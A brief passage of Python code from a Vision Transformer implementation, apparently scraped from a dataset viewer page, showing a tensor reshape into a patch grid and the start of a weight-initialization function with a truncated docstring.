batch, num_patches, depth = x.shape # 128, 256, 192
x = x.permute(0,2,1) # 128, 192, 256
x = x.reshape(batch, depth, grid_size[0], grid_size[1])
return x
def _init_vit_weights(m, n: str = '', head_bias: float = 0., jax_impl: bool = False):
""" ViT weight initialization
* When called without n, head_bias, jax_impl args it will behave exactly the same
as my original init for compatibility with prev hparam / downstream use cases (ie DeiT).
* When called w/ valid n (module |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.